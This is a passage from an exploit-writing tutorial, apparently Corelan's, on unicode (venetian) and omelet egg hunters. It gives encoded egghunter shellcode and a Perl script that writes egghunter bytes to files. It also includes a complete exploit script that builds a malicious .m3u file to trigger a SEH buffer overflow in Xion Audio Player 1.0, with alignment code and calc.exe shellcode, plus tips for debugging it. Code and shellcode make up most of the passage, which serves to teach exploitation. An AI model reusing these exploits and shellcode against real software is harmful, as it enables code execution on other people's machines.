Game over.<\/p>\n<p>Converting the egg hunter to venetian shellcode is as easy as putting the egghunter (including the tag) in a file, and using alpha2 (or the recently released <a href=\"http:\/\/code.google.com\/p\/alpha3\/\" target=\"_blank\" rel=\"noopener\">alpha3<\/a> (by skylined)) to convert it to unicode (pretty much as explained in my previous tutorial about unicode).<\/p>\n<p>In case you\u2019re too tired to do it yourself, this is a unicode version of the egghunter, using w00t as tag, and using EAX as base register :<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\">#Corelan Unicode egghunter - Basereg=EAX - tag=w00t\n<span style=\"color: #0000ff;\">my<\/span> $egghunter = \"<span style=\"color: #8b0000;\">PPYAIAIAIAIAQATAXAZAPA3QADAZ<\/span>\".\n\"<span style=\"color: #8b0000;\">ABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAX<\/span>\".\n\"<span style=\"color: #8b0000;\">A58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABA<\/span>\".\n\"<span style=\"color: #8b0000;\">BAB30APB944JBQVE1HJKOLOPB0RBJLBQHHMNNOLM5PZ4<\/span>\".\n\"<span style=\"color: #8b0000;\">4JO7H2WP0P0T4TKZZFOSEZJ6OT5K7KO9WA<\/span>\";<\/pre>\n<p>The nice thing about unicode egg hunters is that it is easier to tweak the location where the egg hunter will start its search, if that would be required.<\/p>\n<p>Remember when we talked about this a little bit earlier ?\u00a0 If the egg+shellcode can be found on the stack, then why search through large pieces of memory if we can find it close to where the egg hunter is ?\u00a0 The nice thing is that you can create egghunter code that contains null bytes, because null bytes won\u2019t be a problem in a unicode payload.<\/p>\n<p>So if you want to replace \u201c\\x66\\x81\\xCA\\xFF\\x0F\u201d\u00a0 with \u201c\\x66\\x81\\xCA\\x00\\x00\u201d to influence the start location of the hunter, then be my guest. 
(In fact, this is what I have done when I created the unicode egghunter, not because I had to, but merely because I wanted to try).<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<h4>Scenario 2 : Unicode payload only<\/h4>\n<p>In this scenario, you cannot control the contents of memory with ascii shellcode, so basically everything is unicode.<\/p>\n<p>It\u2019s still doable, but it will take a little longer to build a working exploit.<\/p>\n<p>First of all, you still need a unicode egghunter, but you will need to make sure the tag\/marker is unicode friendly as well. After all, you will have to put the tag before the real shellcode (and this tag will be unicode).<\/p>\n<p>In addition to that, you will need to align a register 2 times : one time to execute the egg hunter, and then a second time, between the tag and the real shellcode (so you can decode the real shellcode as well). So, in short :<\/p>\n<p>- Trigger overflow and redirect execution to<\/p>\n<p>- code that aligns a register and adds some padding if required, and then jumps to<\/p>\n<p>- unicode shellcode that would self-decode and run the egg hunter, which would<\/p>\n<p>- look for a double tag in memory (locating the egg - unicode friendly) and then<\/p>\n<p>- execute the code right after the tag, which would need to<\/p>\n<p>- align the register again, add some padding, and then<\/p>\n<p>- execute the unicode (real) shellcode (which will decode itself again and run the final shellcode)<\/p>\n<p>&nbsp;<\/p>\n<p>We basically need to build a venetian egghunter that contains a tag, which can be used to prepend the real shellcode, and is unicode friendly.\u00a0 In the examples above, I have used w00t as tag, which in hex is 0x77,0x30,0x30,0x74\u00a0 (= w00t reversed because of little endian).\u00a0 So if we would replace the first and third byte with a null byte, it would become\u00a0 0x00,0x30,0x00,0x74 (or, in ascii :\u00a0\u00a0 t - null - 0 - null)<\/p>\n<p>A little script that will write the egghunter in a 
binary form to a file would be :<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\">#!\/usr\/bin\/perl\n# Little script to <span style=\"color: #0000ff;\">write<\/span> egghunter shellcode to file\n# 2 files will be created :\n# - egghunter.bin : contains w00t as tag\n# - egghunterunicode.bin : contains 0x00,0x30,0x00,0x74 as tag\n#\n# Written by Peter Van Eeckhoutte\n# http:<span style=\"color: #008000;\">\/\/www.corelan.be<\/span>\n#\n<span style=\"color: #0000ff;\">my<\/span> $egghunter =\n\"<span style=\"color: #8b0000;\">\\x66\\x81\\xCA\\xFF\\x0F\\x42\\x52\\x6A\\x02\\x58\\xCD\\x2E\\x3C\\x05\\x5A\\x74\\xEF\\xB8<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x77\\x30\\x30\\x74<\/span>\". # this is the marker\/tag: w00t\n\"<span style=\"color: #8b0000;\">\\x8B\\xFA\\xAF\\x75\\xEA\\xAF\\x75\\xE7\\xFF\\xE7<\/span>\"; \n\n<span style=\"color: #0000ff;\">print<\/span> \"<span style=\"color: #8b0000;\">Writing egghunter with tag w00t to file egghunter.bin...\\n<\/span>\";\n<span style=\"color: #0000ff;\">open<\/span>(FILE,\"<span style=\"color: #8b0000;\">&gt;egghunter.bin<\/span>\");\n<span style=\"color: #0000ff;\">binmode<\/span>(FILE);  # raw bytes, no newline translation\n<span style=\"color: #0000ff;\">print<\/span> FILE $egghunter;\n<span style=\"color: #0000ff;\">close<\/span>(FILE); \n\n<span style=\"color: #0000ff;\">print<\/span> \"<span style=\"color: #8b0000;\">Writing egghunter with unicode tag to file egghunterunicode.bin...\\n<\/span>\";\n<span style=\"color: #0000ff;\">open<\/span>(FILE,\"<span style=\"color: #8b0000;\">&gt;egghunterunicode.bin<\/span>\");\n<span style=\"color: #0000ff;\">binmode<\/span>(FILE);\n<span style=\"color: #0000ff;\">print<\/span> FILE \"<span style=\"color: #8b0000;\">\\x66\\x81\\xCA\\xFF\\x0F\\x42\\x52\\x6A\\x02\\x58\\xCD\\x2E\\x3C<\/span>\";\n<span style=\"color: #0000ff;\">print<\/span> FILE \"<span style=\"color: #8b0000;\">\\x05\\x5A\\x74\\xEF\\xB8<\/span>\";\n<span style=\"color: #0000ff;\">print<\/span> FILE \"<span style=\"color: #8b0000;\">\\x00<\/span>\";\u00a0\u00a0 #null\n<span 
style=\"color: #0000ff;\">print<\/span> FILE \"<span style=\"color: #8b0000;\">\\x30<\/span>\";\u00a0\u00a0 #0\n<span style=\"color: #0000ff;\">print<\/span> FILE \"<span style=\"color: #8b0000;\">\\x00<\/span>\";\u00a0\u00a0 #null\n<span style=\"color: #0000ff;\">print<\/span> FILE \"<span style=\"color: #8b0000;\">\\x74<\/span>\";\u00a0\u00a0 #t\n<span style=\"color: #0000ff;\">print<\/span> FILE \"<span style=\"color: #8b0000;\">\\x8B\\xFA\\xAF\\x75\\xEA\\xAF\\x75\\xE7\\xFF\\xE7<\/span>\";\n<span style=\"color: #0000ff;\">close<\/span>(FILE);<\/pre>\n<p>(as you can see, it will also write the ascii egghunter to a file - may come in handy one day)<\/p>\n<p>Now convert the egghunterunicode.bin to venetian shellcode :<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\">.\/alpha2 eax --unicode --uppercase &lt; egghunterunicode.bin\nPPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI\n1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABA\nBABAB30APB944JBQVSQGZKOLOORB2BJLB0XHMNNOLLEPZ3DJO6XKPNPKP\nRT4KZZVO2UJJ6ORUJGKOK7A<\/pre>\n<p>When building the unicode payload, you need to prepend the unicode compatible tag string to the real (unicode) shellcode :\u00a0 \u201c0t0t\u201d (without the quotes of course). When this string gets converted to unicode, it becomes 0x00 0x30 0x00 0x74 0x00 0x30 0x00 0x74\u2026 and that corresponds with the marker that was put in the egghunter before it was converted to unicode (see script above).<\/p>\n<p>Between this 0t0t tag and the real (venetian) shellcode that needs to be placed after the marker, you may have to include register alignment, otherwise the venetian decoder will not work. 
If, for example, you have converted your real shellcode to venetian shellcode using eax as basereg, you\u2019ll have to make that register point to the beginning of the decoder again\u2026\u00a0\u00a0 If you have read <a href=\"https:\/\/www.corelan.be\/index.php\/2009\/11\/06\/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc\/\" target=\"_blank\" rel=\"noopener\">tutorial part<\/a> 7, you know what I\u2019m talking about.<\/p>\n<p>In most cases, the egghunter will already have put the current stack address in EDI (it uses that register to keep track of the location in memory where the egg tag is located; right after the tag is found, this register points to the last byte of the tag). So it would be trivial to (for example) move edi into eax and increase eax until it points to the address where the venetian shellcode is located, or to just modify edi (and use venetian shellcode generated using edi as base register).<\/p>\n<p>The first instruction for alignment will start with a null byte (because that\u2019s the last byte of the egg tag (30 00 74 00 30 00 74 00) that we have used).\u00a0 So we need to start alignment with an instruction that is in the 00 xx 00 form.\u00a0\u00a0 00 6d 00 would work (and others will work too).<\/p>\n<blockquote><p>Note : make sure the decoder for the venetian shellcode does not overwrite any of the egg hunter or the egg itself, as that will obviously break the exploit.<\/p><\/blockquote>\n<h4>Let\u2019s see if the theory works<\/h4>\n<p>We\u2019ll use the vulnerability in xion audio player 1.0 build 121 again (see <a href=\"https:\/\/www.corelan.be\/index.php\/2009\/11\/06\/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc\/\" target=\"_blank\" rel=\"noopener\">tutorial part 7<\/a>) to demonstrate that this actually works. I\u2019m not going to repeat all steps to build the exploit and alignments, but I have included some details about it inside the exploit script itself. 
Building\/reading\/using this exploit requires you to really master the stuff explained in tutorial part 7. So if you don\u2019t understand it yet, I would strongly suggest either reading it first, or skipping this exploit and moving on to the next chapter.<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\"># [*] Vulnerability : Xion Audio Player Local BOF\n# [*] Written by : corelanc0d3r (corelanc0d3r[at]gmail[dot]com)\n# -----------------------------------------------------------------------\n# Exploit based on original unicode exploit from tutorial part 7\n# but this <span style=\"color: #0000ff;\">time<\/span> I'm using a unicode egghunter, just for phun !\n#\n# Script provided 'as is', without any warranty.\n# Use for educational purposes only.\n#\n<span style=\"color: #0000ff;\">my<\/span> $sploitfile=\"<span style=\"color: #8b0000;\">corelansploit.m3u<\/span>\";\n<span style=\"color: #0000ff;\">my<\/span> $junk = \"<span style=\"color: #8b0000;\">\\x41<\/span>\" x 254;  #<span style=\"color: #0000ff;\">offset<\/span> until we hit SEH\n<span style=\"color: #0000ff;\">my<\/span> $nseh=\"<span style=\"color: #8b0000;\">\\x58\\x48<\/span>\"; #put something into eax - simulate nop\n<span style=\"color: #0000ff;\">my<\/span> $seh=\"<span style=\"color: #8b0000;\">\\xf5\\x48<\/span>\"; #ppr from xion.exe - unicode compatible\n# will also simulate nop when executed\n# after p\/p\/r is executed, we end here\n# in order to be able to run the unicode decoder\n# we need to have eax pointing at <span style=\"color: #0000ff;\">our<\/span> decoder stub\n# we'll make eax point to <span style=\"color: #0000ff;\">our<\/span> buffer\n# we'll <span style=\"color: #0000ff;\">do<\/span> this by putting ebp in eax and then increase eax\n# until it points to <span style=\"color: #0000ff;\">our<\/span> egghunter\n#first, put ebp in eax (<span style=\"color: #0000ff;\">push<\/span> \/ <span style=\"color: 
#0000ff;\">pop<\/span>)\n<span style=\"color: #0000ff;\">my<\/span> $align=\"<span style=\"color: #8b0000;\">\\x55<\/span>\";  #<span style=\"color: #0000ff;\">push<\/span> ebp\n$align=$align.\"<span style=\"color: #8b0000;\">\\x6d<\/span>\";   #align\/nop\n$align=$align.\"<span style=\"color: #8b0000;\">\\x58<\/span>\";   #<span style=\"color: #0000ff;\">pop<\/span> eax\n$align=$align.\"<span style=\"color: #8b0000;\">\\x6d<\/span>\";   #align\/nop\n#now increase the address in eax so it would point to <span style=\"color: #0000ff;\">our<\/span> buffer\n$align = $align.\"<span style=\"color: #8b0000;\">\\x05\\x10\\x11<\/span>\";   #add eax,11001300\n$align=$align.\"<span style=\"color: #8b0000;\">\\x6d<\/span>\";   #align\/nop\n$align=$align.\"<span style=\"color: #8b0000;\">\\x2d\\x02\\x11<\/span>\";   #<span style=\"color: #0000ff;\">sub<\/span> eax,11000200\n$align=$align.\"<span style=\"color: #8b0000;\">\\x6d<\/span>\";   #align\/nop\n#eax now points at egghunter\n#jump to eax now\n<span style=\"color: #0000ff;\">my<\/span> $jump = \"<span style=\"color: #8b0000;\">\\x50<\/span>\";  #<span style=\"color: #0000ff;\">push<\/span> eax\n$jump=$jump.\"<span style=\"color: #8b0000;\">\\x6d<\/span>\"; #nop\/align\n$jump=$jump.\"<span style=\"color: #8b0000;\">\\xc3<\/span>\"; #ret\n#fill the space between here and eax\n<span style=\"color: #0000ff;\">my<\/span> $padding=\"<span style=\"color: #8b0000;\">A<\/span>\" x 73;\n#this is what will be put at eax :\n<span style=\"color: #0000ff;\">my<\/span> $egghunter =\"<span style=\"color: #8b0000;\">PPYAIAIAIAIAQATAXAZAPA3QADAZA<\/span>\".\n\"<span style=\"color: #8b0000;\">BARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA<\/span>\".\n\"<span style=\"color: #8b0000;\">58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABAB<\/span>\".\n\"<span style=\"color: #8b0000;\">AB30APB944JB36CQ7ZKPKPORPR2JM2PXXMNNOLKUQJRT<\/span>\".\n\"<span style=\"color: #8b0000;\">ZOVXKPNPM0RT4KKJ6ORUZJFO2U9WKOZGA<\/span>\";\n\n# - ok so far the exploit looks 
the same as the one used in tutorial 7\n# except for the fact that the shellcode is the unicode version of\n# an egghunter looking for the \"<span style=\"color: #8b0000;\">0t0t<\/span>\" egg marker\n# the egghunter was converted to unicode using eax as basereg\n#\n# Between the egghunter and the shellcode that it should look for\n# I'll <span style=\"color: #0000ff;\">write<\/span> some garbage (a couple of X's in this case)\n# So we'll pretend the real shellcode is somewhere out there\n\n<span style=\"color: #0000ff;\">my<\/span> $garbage = \"<span style=\"color: #8b0000;\">X<\/span>\" x 50; \n\n# real shellcode (venetian, uses EAX as basereg)\n# will spawn calc.exe\n<span style=\"color: #0000ff;\">my<\/span> $shellcode=\"<span style=\"color: #8b0000;\">PPYAIAIAIAIAQATAXAZAPA3QADAZA<\/span>\".\n\"<span style=\"color: #8b0000;\">BARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAX<\/span>\".\n\"<span style=\"color: #8b0000;\">A58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABAB<\/span>\".\n\"<span style=\"color: #8b0000;\">ABAB30APB944JBKLK8OTKPKPM0DKOUOLTKSLM5SHKQJ<\/span>\".\n\"<span style=\"color: #8b0000;\">O4K0OLXTKQOMPKQZKOYTKP44KM1ZNNQY0V96L3TWPT4<\/span>\".\n\"<span style=\"color: #8b0000;\">KW7QHJLMKQWRZKL4OKQDNDKTBUIUTK1OO4KQJK1VTKL<\/span>\".\n\"<span style=\"color: #8b0000;\">LPK4K1OMLM1ZK4KMLTKKQJKSY1LMTKTGSNQWPRDTKOP<\/span>\".\n\"<span style=\"color: #8b0000;\">NPU5902XLLTKOPLLDK2PMLFMTKQXM8JKM94K3P6PM0K<\/span>\".\n\"<span style=\"color: #8b0000;\">PKP4KQXOLQONQL6QPPV59KH53GP3K0PQXJPDJM4QO2H<\/span>\".\n\"<span style=\"color: #8b0000;\">68KN4JLN0WKOK7QSC1RLQSKPA<\/span>\";\n# between the egg marker and shellcode, we need to align\n# so eax points at the beginning of the real shellcode\n<span style=\"color: #0000ff;\">my<\/span> $align2 = \"<span style=\"color: #8b0000;\">\\x6d\\x57\\x6d\\x58\\x6d<\/span>\";  #nop, <span style=\"color: #0000ff;\">push<\/span> edi, nop, <span style=\"color: #0000ff;\">pop<\/span> eax, nop\n$align2 = $align2.\"<span style=\"color: 
#8b0000;\">\\xb9\\x1b\\xaa<\/span>\";  #mov ecx, 0xaa001b00\n$align2 = $align2.\"<span style=\"color: #8b0000;\">\\xe8\\x6d<\/span>\";  #add al,ch + nop  (increase eax with 1b)\n$align2 = $align2.\"<span style=\"color: #8b0000;\">\\x50\\x6d\\xc3<\/span>\";  #<span style=\"color: #0000ff;\">push<\/span> eax, nop, ret\n#eax now points at the real shellcode\n\n#fill up rest of space &amp; trigger access violation\n<span style=\"color: #0000ff;\">my<\/span> $filler = (\"<span style=\"color: #8b0000;\">\\xcc<\/span>\" x (15990-<span style=\"color: #0000ff;\">length<\/span>($shellcode)));\n\n#payload\n<span style=\"color: #0000ff;\">my<\/span> $payload = $junk.$nseh.$seh.$align.$jump.$padding.$egghunter;\n$payload=$payload.$garbage.\"<span style=\"color: #8b0000;\">0t0t<\/span>\".$align2.$shellcode.$filler;\n\n<span style=\"color: #0000ff;\">open<\/span>(myfile,\"<span style=\"color: #8b0000;\">&gt;$sploitfile<\/span>\");\n<span style=\"color: #0000ff;\">print<\/span> myfile $payload;\n<span style=\"color: #0000ff;\">print<\/span> \"<span style=\"color: #8b0000;\">Wrote <\/span>\" . <span style=\"color: #0000ff;\">length<\/span>($payload).\"<span style=\"color: #8b0000;\"> bytes to $sploitfile\\n<\/span>\";\n<span style=\"color: #0000ff;\">close<\/span>(myfile);<\/pre>\n<p>&nbsp;<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image19.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb19.png\" alt=\"image\" width=\"447\" height=\"266\" border=\"0\" \/><\/a><\/p>\n<p>pwned !<\/p>\n<blockquote><p>Note : if size is really an issue (for the final shellcode), you could make the alignment code a number of bytes shorter by using what is in edi already (instead of using eax as basereg. 
Of course you then need to generate the shellcode using edi as basereg), and by avoiding the push + ret instructions. You could simply make edi point to the address directly after the last alignment instruction with some simple instructions.<\/p><\/blockquote>\n<p>Another example of unicode (or venetian) egghunter code can be found here : <a title=\"http:\/\/www.pornosecurity.org\/blog\/exploiting-bittorrent\" href=\"http:\/\/www.pornosecurity.org\/blog\/exploiting-bittorrent\">http:\/\/www.pornosecurity.org\/blog\/exploiting-bittorrent<\/a> (demo at <a title=\"http:\/\/www.pornosecurity.org\/bittorrent\/bittorrent.html\" href=\"http:\/\/www.pornosecurity.org\/bittorrent\/bittorrent.html\">http:\/\/www.pornosecurity.org\/bittorrent\/bittorrent.html<\/a>)<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<h4>Some tips for debugging this kind of exploit using Immunity Debugger :<\/h4>\n<p>This is a SEH based exploit, so when the app crashes, see where the SEH chain is and set a breakpoint at the chain. Pass the exception (Shift F9) to the application and the breakpoint will be hit. 
On my system, the seh chain was located at 0x0012f2ac<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image20.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb20.png\" alt=\"image\" width=\"341\" height=\"183\" border=\"0\" \/><\/a><\/p>\n<p>Trace through the instructions (F7) until you see that the decoder starts decoding the egghunter and writing the original instructions on the stack.<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image21.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb21.png\" alt=\"image\" width=\"519\" height=\"131\" border=\"0\" \/><\/a><\/p>\n<p>In my case, the decoder started writing the original egghunter to 0x0012f460.<\/p>\n<p>As soon as I could see the first instruction at 0x0012f460 (which is 66 81 CA and so on), I set a breakpoint at 0x0012f460.<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image22.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb22.png\" alt=\"image\" width=\"515\" height=\"322\" border=\"0\" \/><\/a><\/p>\n<p>Then press CTRL+F12. Breakpoint would be hit and you would land at 0x0012f460. 
The original egghunter is now recombined and will start searching for the marker.<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image23.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb23.png\" alt=\"image\" width=\"518\" height=\"402\" border=\"0\" \/><\/a><\/p>\n<p>At 0x0012f47b (see screenshot), we see the instruction that will be executed when the egg has been found. Set a new breakpoint on 0x0012f47b and press CTRL-F12 again.\u00a0\u00a0 If you end up at the breakpoint, then the egg has been found.\u00a0 Press F7 (trace) again to execute the next instructions until the jmp to edi is made.\u00a0 (the egghunter has put the address of the egg in EDI, and jmp edi now redirects flow to that location).\u00a0 When the jmp edi is made, we land on the last byte of the marker.<\/p>\n<p>This is where our second alignment code is placed.\u00a0 It will make eax point to the shellcode (decoder stub) and will then perform the push eax + ret.<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image24.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb24.png\" alt=\"image\" width=\"503\" height=\"304\" border=\"0\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<h3>Omelet egg hunter (All your eggs, even the broken ones, are belong to us !)<\/h3>\n<h4>Huh ? Broken eggs ? 
What you say ?<\/h4>\n<p>What if you find yourself in a situation where you don\u2019t really have a big amount of memory space to host your shellcode, but you have multiple smaller spaces available \/ controlled by you ?\u00a0 In this scenario, dictated by shellcode fragmentation, a technique called omelet egg hunting may work.<\/p>\n<p>In this technique, you would break up the actual shellcode into smaller pieces, deliver the pieces to memory, and launch the hunter code which would search for all eggs, recombine them, and make an omelet \u2026 err \u2026 I mean it would execute the recombined shellcode.<\/p>\n<p>The basic concept behind the omelet egg hunter is pretty much the same as with regular egg hunters, but there are 2 main differences :<\/p>\n<p>- the final shellcode is broken down into pieces (= multiple eggs)<\/p>\n<p>- the final shellcode is recombined before it is executed (so it\u2019s not executed directly after it has been found)<\/p>\n<p>In addition to that, the egghunter code (or omelet code) is significantly larger than a normal egghunter (around 90 bytes vs between 30 and 60 bytes for a normal egghunter).<\/p>\n<p>This technique was documented by skylined (Berend-Jan Wever) here (Google Project files can be found <a href=\"http:\/\/code.google.com\/p\/w32-seh-omelet-shellcode\/\" target=\"_blank\" rel=\"noopener\">here<\/a>.) Quote from Berend-Jan :<\/p>\n<blockquote><p>It is similar to egg-hunt shellcode, but will search user-land address space for multiple smaller eggs and recombine them into one larger block of shellcode and execute it. This is useful in situations where you cannot inject a block of sufficient size into a target process to store your shellcode in one piece, but you can inject multiple smaller blocks and execute one of them.<\/p><\/blockquote>\n<h4>How does it work?<\/h4>\n<p>The original shellcode needs to be split into smaller pieces\/eggs. 
Each egg needs to have a header that contains<\/p>\n<p>- the length of the egg data (one byte; the 5-byte header itself is not counted)<\/p>\n<p>- an index number (one byte, counting down from 0xFF)<\/p>\n<p>- 3 marker bytes (used to detect the egg)<\/p>\n<p>The omelet shellcode\/egg hunter also needs to know what the size of the eggs is, how many eggs there will be, and what the 3 bytes are (tag or marker) that identify an egg.<\/p>\n<p>When the omelet code executes, it will search through memory, look for all the eggs, and reproduce the original shellcode (before it was broken into pieces) at the bottom of the stack. When it has completed, it jumps to the reproduced shellcode and executes it.\u00a0\u00a0 The omelet code written by skylined injects custom SEH handlers in order to deal with access violations when reading memory.<\/p>\n<p>Luckily, skylined wrote a set of scripts to automate the entire process of breaking down shellcode into smaller eggs and producing the omelet code. Download the scripts <a href=\"http:\/\/code.google.com\/p\/w32-seh-omelet-shellcode\/downloads\/list\" target=\"_blank\" rel=\"noopener\">here<\/a>. (The zip file contains the nasm file that contains the omelet hunter and a python script to create the eggs). If you don\u2019t have a copy of nasm, you can get a copy <a href=\"http:\/\/www.nasm.us\/pub\/nasm\/releasebuilds\/\" target=\"_blank\" rel=\"noopener\">here<\/a>.<\/p>\n<p>I have unzipped the omelet code package to c:\\omelet.\u00a0 nasm is installed under \u201cc:\\program files\\nasm\u201d.<\/p>\n<p>Compile the nasm file to a binary file :<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 765px; height: 52px; overflow: auto; border: #cecece 1px solid; padding: 5px;\">C:\\omelet&gt;\"<span style=\"color: #8b0000;\">c:\\program files\\nasm\\nasm.exe<\/span>\" -f bin -o w32_omelet.bin w32_SEH_omelet.asm -w+error<\/pre>\n<p>(you only need to do this one time. 
Once you have this file, you can use it for all exploits)<\/p>\n<h4>How to implement the omelet egg hunter ?<\/h4>\n<p><strong><span style=\"text-decoration: underline;\">1. Create a file that contains the shellcode<\/span><\/strong> that you want to execute in the end.\u00a0 (I used \u201cshellcode.bin\u201d)<\/p>\n<p>(You can use a script like this to generate the shellcode.bin file. Simply replace the $shellcode with your own shellcode and run the script. In my example, this shellcode will spawn calc.exe) :<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\"><span style=\"color: #0000ff;\">my<\/span> $scfile=\"<span style=\"color: #8b0000;\">shellcode.bin<\/span>\";\n<span style=\"color: #0000ff;\">my<\/span> $shellcode=\"<span style=\"color: #8b0000;\">\\x89\\xe2\\xda\\xc1\\xd9\\x72\\xf4\\x58\\x50\\x59\\x49\\x49\\x49\\x49<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x43\\x43\\x43\\x43\\x43\\x43\\x51\\x5a\\x56\\x54\\x58\\x33\\x30\\x56<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x58\\x34\\x41\\x50\\x30\\x41\\x33\\x48\\x48\\x30\\x41\\x30\\x30\\x41<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x42\\x41\\x41\\x42\\x54\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x30\\x42\\x42\\x58\\x50\\x38\\x41\\x43\\x4a\\x4a\\x49\\x4b\\x4c\\x4a<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x48\\x50\\x44\\x43\\x30\\x43\\x30\\x45\\x50\\x4c\\x4b\\x47\\x35\\x47<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4c\\x4c\\x4b\\x43\\x4c\\x43\\x35\\x43\\x48\\x45\\x51\\x4a\\x4f\\x4c<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4b\\x50\\x4f\\x42\\x38\\x4c\\x4b\\x51\\x4f\\x47\\x50\\x43\\x31\\x4a<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4b\\x51\\x59\\x4c\\x4b\\x46\\x54\\x4c\\x4b\\x43\\x31\\x4a\\x4e\\x50<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x31\\x49\\x50\\x4c\\x59\\x4e\\x4c\\x4c\\x44\\x49\\x50\\x43\\x44\\x43<\/span>\" 
.\n\"<span style=\"color: #8b0000;\">\\x37\\x49\\x51\\x49\\x5a\\x44\\x4d\\x43\\x31\\x49\\x52\\x4a\\x4b\\x4a<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x54\\x47\\x4b\\x51\\x44\\x46\\x44\\x43\\x34\\x42\\x55\\x4b\\x55\\x4c<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4b\\x51\\x4f\\x51\\x34\\x45\\x51\\x4a\\x4b\\x42\\x46\\x4c\\x4b\\x44<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4c\\x50\\x4b\\x4c\\x4b\\x51\\x4f\\x45\\x4c\\x45\\x51\\x4a\\x4b\\x4c<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4b\\x45\\x4c\\x4c\\x4b\\x45\\x51\\x4a\\x4b\\x4d\\x59\\x51\\x4c\\x47<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x54\\x43\\x34\\x48\\x43\\x51\\x4f\\x46\\x51\\x4b\\x46\\x43\\x50\\x50<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x56\\x45\\x34\\x4c\\x4b\\x47\\x36\\x50\\x30\\x4c\\x4b\\x51\\x50\\x44<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4c\\x4c\\x4b\\x44\\x30\\x45\\x4c\\x4e\\x4d\\x4c\\x4b\\x45\\x38\\x43<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x38\\x4b\\x39\\x4a\\x58\\x4c\\x43\\x49\\x50\\x42\\x4a\\x50\\x50\\x42<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x48\\x4c\\x30\\x4d\\x5a\\x43\\x34\\x51\\x4f\\x45\\x38\\x4a\\x38\\x4b<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4e\\x4d\\x5a\\x44\\x4e\\x46\\x37\\x4b\\x4f\\x4d\\x37\\x42\\x43\\x45<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x31\\x42\\x4c\\x42\\x43\\x45\\x50\\x41\\x41<\/span>\";\n\n<span style=\"color: #0000ff;\">open<\/span>(FILE,\"<span style=\"color: #8b0000;\">&gt;$scfile<\/span>\");\n<span style=\"color: #0000ff;\">print<\/span> FILE $shellcode;\n<span style=\"color: 